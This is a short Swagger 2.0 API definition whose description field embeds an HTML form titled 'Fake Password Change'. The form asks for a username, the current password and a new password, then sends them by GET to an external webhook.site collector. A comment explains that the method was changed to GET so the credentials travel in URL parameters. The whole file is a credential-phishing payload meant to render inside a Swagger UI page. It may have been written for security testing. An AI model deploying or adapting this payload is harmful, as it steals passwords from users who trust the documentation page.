swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Password Change Page
  description: '<div class="password-change-form">
    <div class="heading">
        <h1>Fake Password Change</h1>
    </div>
    <div class="form-container">
        <form action="https://webhook.site/3d0ad3a0-8ea0-4134-ace6-6f34b97b7774" method="get" class="form-change">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="user" size="20">
            </div>
            <div class="form-group">
                <label for="password">Current Password</label>
                <input type="password" name="passwd" size="20">
            </div>
             <div class="form-group">
                <label for="newpassword">New Password</label>
                <input type="password" name="newpasswd" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Change Password</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    get: # changed from post to get to send via url parameters
      responses:
        '200':
          description: Password change attempt sent.
